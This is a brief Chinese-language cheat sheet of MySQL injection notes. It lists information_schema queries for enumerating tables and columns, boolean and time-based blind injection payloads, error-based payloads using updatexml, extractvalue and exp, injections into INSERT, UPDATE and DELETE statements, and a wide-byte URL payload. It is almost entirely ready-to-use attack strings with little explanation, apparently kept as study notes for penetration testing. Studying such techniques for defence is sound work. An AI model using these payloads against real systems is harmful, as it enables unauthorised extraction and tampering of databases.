MySQL注入笔记
MySQL基础知识
information_schema //MySQL自带数据表
table_schema //数据库名
table_name //表名
column_name //列名
select table_name information_schema.tables where table_schema=database(); //跑表名
select column_name from information_schema.columns where table_name='admin' //跑列名
select password from admin//跑数据
盲注
运用的一些函数
substr(version(),1,1); //截取 第一字节 开始 数的 第一个字节
if(1=1,sleep(5),1); 如果1=1 那么sleep(5) 否则输出1
ord('a') //acill 97
bool 盲注
形如 ‘=(bool)=’ ,and ‘1’=’1’ , and 1=1
admin'=(select(substr((select(passwd)from(user))from(1)for(1)))=8)='1 //
时间盲注
形如 if(1=1,sleep(5),1)
if(ord((select substr(username,{0},1) from user ))=50,sleep(3)
select table_name from information_schema.tables where table_schema=database()
select if(ord(substr((select table_name from information_schema.tables where table_schema=database()),0,1))=117,sleep(5),1);
select if(ord(substr((select username from user limit 1),1,1))=108,sleep(5),1);
insert update delect注入 引用
insert语句
insert into users (id, username, password) values (2,''injecthere'','Olivia');
insert into users (id, username, password) values (2,""injecthere"",'Olivia');
payload
or updatexml(1,concat(0x7e,(version())),0) or
insert
INSERT INTO users (id, username, password) VALUES (2,'Olivia' or updatexml(1,concat(0x7e,(version())),0) or'', 'Nervo');
update
UPDATE users SET password='Nicky' or updatexml(2,concat(0x7e,(version())),0) or''WHERE id=2 and username='Olivia';
delete
DELETE FROM users WHERE id=2 or updatexml(1,concat(0x7e,(version())),0) or'';
报错注入(xpath,updatemal,exp)
XPATH注入
0x7e表示的是“~”符号
+and+extractvalue(rand(),concat(0x7e,version()))-- //报错回显版本号
updatexml报错注入
+and+updatexml(0x7e,concat(0x7e,(version())),0)--
exp报错注入
and EXP(~(SELECT * from(select user())a))
宽字节注入
?id=-1%df%27union%20select%201,user(),3--+